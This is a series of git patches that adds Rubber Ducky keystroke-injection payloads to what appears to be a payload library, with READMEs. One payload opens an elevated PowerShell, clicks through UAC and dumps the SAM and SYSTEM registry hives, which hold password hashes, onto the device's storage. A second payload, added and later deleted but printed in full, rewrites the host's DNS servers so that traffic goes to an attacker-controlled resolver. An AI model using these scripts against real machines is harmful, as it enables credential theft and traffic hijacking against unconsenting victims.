From 554b3066b79c577db4487ccc40ebb6aba233a1e7 Mon Sep 17 00:00:00 2001
From: Luu <112649910+luu176@users.noreply.github.com>
Date: Thu, 31 Oct 2024 12:46:27 +0100
Subject: [PATCH 1/8] Create payload.txt

---
 .../exfiltration/NTLM_ducky/payload.txt       | 81 +++++++++++++++++++
 1 file changed, 81 insertions(+)
 create mode 100644 payloads/library/exfiltration/NTLM_ducky/payload.txt

diff --git a/payloads/library/exfiltration/NTLM_ducky/payload.txt b/payloads/library/exfiltration/NTLM_ducky/payload.txt
new file mode 100644
index 0000000..7cb167e
--- /dev/null
+++ b/payloads/library/exfiltration/NTLM_ducky/payload.txt
@@ -0,0 +1,81 @@
+REM_BLOCK
+TITLE           Exfiltrate NTLM Hash Files onto Ducky Storage
+AUTHOR          Luu176
+DESCRIPTION     This payload exfiltrates NTLM hash files (which contain hashed passwords for users 
+                on the current Windows device) to the Rubber Ducky's SD card for further analysis. 
+                It utilizes PowerShell commands to locate and save NTLM files (SAM and SYSTEM) to 
+                the defined storage drive on the Ducky device.
+END_REM
+
+DEFINE #driveLabel DUCKY
+REM below you can set the number of blinks for the caps lock when finished (default 9)
+DEFINE #numBlinks 9
+
+ATTACKMODE HID STORAGE
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+SAVE_HOST_KEYBOARD_LOCK_STATE
+IF ($_CAPSLOCK_ON == TRUE)
+    CAPSLOCK
+END_IF
+GUI d
+DELAY 1000
+GUI r
+DELAY 500
+STRINGLN powershell Start-Process powershell -Verb runAs
+DELAY 800
+ALT y
+DELAY 800
+STRINGLN cd (gwmi win32_volume -f 'label=''#driveLabel''').Name;reg save hklm\sam SAM;reg save hklm\system SYS;(New-Object -ComObject wscript.shell).SendKeys('{CAPSLOCK}');exit
+GUI d
+WAIT_FOR_CAPS_ON 
+REM once finished downloading SAM and SYSTEM, caps lock LED turn on and then flash (note: may take a couple minutes max to download)
+VAR $i = 0
+WHILE ( $i < #numBlinks )
+    DELAY 150
+    CAPSLOCK
+    $i = ( $i + 1 )
+END_WHILE
+RESTORE_HOST_KEYBOARD_LOCK_STATE

From 81ae8f0e8c46e014bb5f0aa6c64e74740e2d1cc8 Mon Sep 17 00:00:00 2001
From: Luu <112649910+luu176@users.noreply.github.com>
Date: Thu, 31 Oct 2024 12:56:53 +0100
Subject: [PATCH 2/8] Create README.md

---
 .../library/exfiltration/NTLM_ducky/README.md | 30 +++++++++++++++++++
 1 file changed, 30 insertions(+)
 create mode 100644 payloads/library/exfiltration/NTLM_ducky/README.md

diff --git a/payloads/library/exfiltration/NTLM_ducky/README.md b/payloads/library/exfiltration/NTLM_ducky/README.md
new file mode 100644
index 0000000..b43d458
--- /dev/null
+++ b/payloads/library/exfiltration/NTLM_ducky/README.md
@@ -0,0 +1,30 @@
+# Exfiltrate NTLM Hash - Windows ✅
+
+A Rubber Ducky payload to exfiltrate NTLM hash files from a Windows machine onto the SD card.
+
+## Description
+
+This payload script captures and <strong>exfiltrates NTLM hash files</strong> from a Windows machine. It uses PowerShell commands to locate and save the SAM and SYSTEM files, which contain hashed user passwords, <strong><u>onto the Rubber Ducky's SD card</u></strong> for later extraction and analysis. Upon successful file extraction, <strong> the payload triggers a visual confirmation by <u>blinking the Caps Lock LED</u> </strong>
+
+
+### Settings
+
+- **Drive Label:** Set the target drive label for Rubber Ducky storage (default: `DUCKY`).
+- **Number o:** Ensure the payload has the necessary permissions for registry access.
+- **Extension Requirements:** This payload includes a passive Windows detection extension for compatibility.
+
+## Credits
+
+<h2 align="center"> Luu176 </h2>
+<div align="center">
+  <table>
+    <tr>
+      <td align="center" width="96">
+        <a href="https://github.com/luu176">
+          <img src="https://avatars.githubusercontent.com/u/112649910?v=4" width="48" height="48" />
+        </a>
+        <br>GitHub
+      </td>
+    </tr>
+  </table>
+</div>

From 4a6e17773dbf4d89a1392b292842e7292fb6827b Mon Sep 17 00:00:00 2001
From: Luu <112649910+luu176@users.noreply.github.com>
Date: Thu, 31 Oct 2024 12:58:23 +0100
Subject: [PATCH 3/8] Update README.md

---
 payloads/library/exfiltration/NTLM_ducky/README.md | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/payloads/library/exfiltration/NTLM_ducky/README.md b/payloads/library/exfiltration/NTLM_ducky/README.md
index b43d458..ee4adfe 100644
--- a/payloads/library/exfiltration/NTLM_ducky/README.md
+++ b/payloads/library/exfiltration/NTLM_ducky/README.md
@@ -10,8 +10,7 @@ This payload script captures and <strong>exfiltrates NTLM hash files</strong> fr
 ### Settings
 
 - **Drive Label:** Set the target drive label for Rubber Ducky storage (default: `DUCKY`).
-- **Number o:** Ensure the payload has the necessary permissions for registry access.
-- **Extension Requirements:** This payload includes a passive Windows detection extension for compatibility.
+- **Blink Count:** Adjust the number of Caps Lock LED blinks by setting the `#numBlinks` variable (default is 9 blinks).
 
 ## Credits
 

From 0bb2f83a10e55ba38241899d00b08da4c96ed28b Mon Sep 17 00:00:00 2001
From: Luu <112649910+luu176@users.noreply.github.com>
Date: Fri, 1 Nov 2024 15:32:44 +0100
Subject: [PATCH 4/8] Create payload.txt

---
 .../library/execution/DNS_changer/payload.txt | 69 +++++++++++++++++++
 1 file changed, 69 insertions(+)
 create mode 100644 payloads/library/execution/DNS_changer/payload.txt

diff --git a/payloads/library/execution/DNS_changer/payload.txt b/payloads/library/execution/DNS_changer/payload.txt
new file mode 100644
index 0000000..14dd010
--- /dev/null
+++ b/payloads/library/execution/DNS_changer/payload.txt
@@ -0,0 +1,69 @@
+REM Title: DNS changer
+REM Author: luu176
+REM Description: Changes DNS address of windows machine in powershell
+REM Target: Windows 10/11
+
+REM wifi interface should be named: Wi-Fi
+DEFINE #interface Ethernet
+DEFINE #primaryDNS 192.168.1.3
+DEFINE #secondaryDNS 1.1.1.1
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+SAVE_HOST_KEYBOARD_LOCK_STATE
+GUI r
+DELAY 150
+STRINGLN powershell Start-Process powershell -Verb runAs
+DELAY 800
+ALT y
+DELAY 500
+STRINGLN Set-DnsClientServerAddress -InterfaceAlias "#interface" -ServerAddresses ("#primaryDNS", "#secondaryDNS"); exit
+REM below is to blink the LED when payload done
+VAR $i = 0
+WHILE ( $i < 9 )
+    DELAY 150
+    CAPSLOCK
+    $i = ( $i + 1 )
+END_WHILE
+RESTORE_HOST_KEYBOARD_LOCK_STATE

From f6fb02fe34d6bb8ec7d350ee92462b88350d7744 Mon Sep 17 00:00:00 2001
From: Luu <112649910+luu176@users.noreply.github.com>
Date: Fri, 1 Nov 2024 15:41:50 +0100
Subject: [PATCH 5/8] Create README.txt

---
 .../library/execution/DNS_spoofer/README.txt  | 27 +++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 payloads/library/execution/DNS_spoofer/README.txt

diff --git a/payloads/library/execution/DNS_spoofer/README.txt b/payloads/library/execution/DNS_spoofer/README.txt
new file mode 100644
index 0000000..d8e199a
--- /dev/null
+++ b/payloads/library/execution/DNS_spoofer/README.txt
@@ -0,0 +1,27 @@
+# Spoof DNS - Windows ✅
+
+DNS Spoofer
+
+## Description
+
+A payload used to alter the machine’s DNS settings, redirecting its DNS requests to an attacker-controlled server that can serve deceptive IP addresses for targeted domains.
+
+### Settings
+
+* Set the primary and secondary dns servers
+
+## Credits
+
+<h2 align="center"> Luu176 </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/luu176">
+        <img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+  </tr>
+</table>
+</div>

From aa5afab7edd64cd55a0baf04b40e953422053873 Mon Sep 17 00:00:00 2001
From: Luu <112649910+luu176@users.noreply.github.com>
Date: Fri, 1 Nov 2024 15:42:11 +0100
Subject: [PATCH 6/8] Rename payload.txt to payload.txt

---
 .../library/execution/{DNS_changer => DNS_spoofer}/payload.txt    | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename payloads/library/execution/{DNS_changer => DNS_spoofer}/payload.txt (100%)

diff --git a/payloads/library/execution/DNS_changer/payload.txt b/payloads/library/execution/DNS_spoofer/payload.txt
similarity index 100%
rename from payloads/library/execution/DNS_changer/payload.txt
rename to payloads/library/execution/DNS_spoofer/payload.txt

From 9a5857b2af271c5bac293a4b15cc9b042b9cd552 Mon Sep 17 00:00:00 2001
From: Luu <112649910+luu176@users.noreply.github.com>
Date: Fri, 1 Nov 2024 22:40:51 +0100
Subject: [PATCH 7/8] Delete payloads/library/execution/DNS_spoofer/README.txt

---
 .../library/execution/DNS_spoofer/README.txt  | 27 -------------------
 1 file changed, 27 deletions(-)
 delete mode 100644 payloads/library/execution/DNS_spoofer/README.txt

diff --git a/payloads/library/execution/DNS_spoofer/README.txt b/payloads/library/execution/DNS_spoofer/README.txt
deleted file mode 100644
index d8e199a..0000000
--- a/payloads/library/execution/DNS_spoofer/README.txt
+++ /dev/null
@@ -1,27 +0,0 @@
-# Spoof DNS - Windows ✅
-
-DNS Spoofer
-
-## Description
-
-A payload used to alter the machine’s DNS settings, redirecting its DNS requests to an attacker-controlled server that can serve deceptive IP addresses for targeted domains.
-
-### Settings
-
-* Set the primary and secondary dns servers
-
-## Credits
-
-<h2 align="center"> Luu176 </h2>
-<div align=center>
-<table>
-  <tr>
-    <td align="center" width="96">
-      <a href="https://github.com/luu176">
-        <img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
-      </a>
-      <br>Github
-    </td>
-  </tr>
-</table>
-</div>

From aeffdbfcbde65a0da6a07df67442c7d610722443 Mon Sep 17 00:00:00 2001
From: Luu <112649910+luu176@users.noreply.github.com>
Date: Fri, 1 Nov 2024 22:41:30 +0100
Subject: [PATCH 8/8] Delete payloads/library/execution/DNS_spoofer/payload.txt

---
 .../library/execution/DNS_spoofer/payload.txt | 69 -------------------
 1 file changed, 69 deletions(-)
 delete mode 100644 payloads/library/execution/DNS_spoofer/payload.txt

diff --git a/payloads/library/execution/DNS_spoofer/payload.txt b/payloads/library/execution/DNS_spoofer/payload.txt
deleted file mode 100644
index 14dd010..0000000
--- a/payloads/library/execution/DNS_spoofer/payload.txt
+++ /dev/null
@@ -1,69 +0,0 @@
-REM Title: DNS changer
-REM Author: luu176
-REM Description: Changes DNS address of windows machine in powershell
-REM Target: Windows 10/11
-
-REM wifi interface should be named: Wi-Fi
-DEFINE #interface Ethernet
-DEFINE #primaryDNS 192.168.1.3
-DEFINE #secondaryDNS 1.1.1.1
-
-EXTENSION PASSIVE_WINDOWS_DETECT
-    REM VERSION 1.1
-    REM AUTHOR: Korben
-
-    REM_BLOCK DOCUMENTATION
-        Windows fully passive OS Detection and passive Detect Ready
-        Includes its own passive detect ready.
-        Does not require additional extensions.
-
-        USAGE:
-            Extension runs inline (here)
-            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
-            boot delay
-            $_OS will be set to WINDOWS or NOT_WINDOWS
-            See end of payload for usage within payload
-    END_REM
-
-    REM CONFIGURATION:
-    DEFINE #MAX_WAIT 150
-    DEFINE #CHECK_INTERVAL 20
-    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
-    DEFINE #NOT_WINDOWS 7
-
-    $_OS = #NOT_WINDOWS
-
-    VAR $MAX_TRIES = #MAX_WAIT
-    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
-        DELAY #CHECK_INTERVAL
-        $MAX_TRIES = ($MAX_TRIES - 1)
-    END_WHILE
-    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
-        $_OS = WINDOWS
-    END_IF
-
-    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
-        IF ($_OS == WINDOWS) THEN
-            STRING HELLO WINDOWS!
-        ELSE
-            STRING HELLO WORLD!
-        END_IF
-    END_REM
-END_EXTENSION
-
-SAVE_HOST_KEYBOARD_LOCK_STATE
-GUI r
-DELAY 150
-STRINGLN powershell Start-Process powershell -Verb runAs
-DELAY 800
-ALT y
-DELAY 500
-STRINGLN Set-DnsClientServerAddress -InterfaceAlias "#interface" -ServerAddresses ("#primaryDNS", "#secondaryDNS"); exit
-REM below is to blink the LED when payload done
-VAR $i = 0
-WHILE ( $i < 9 )
-    DELAY 150
-    CAPSLOCK
-    $i = ( $i + 1 )
-END_WHILE
-RESTORE_HOST_KEYBOARD_LOCK_STATE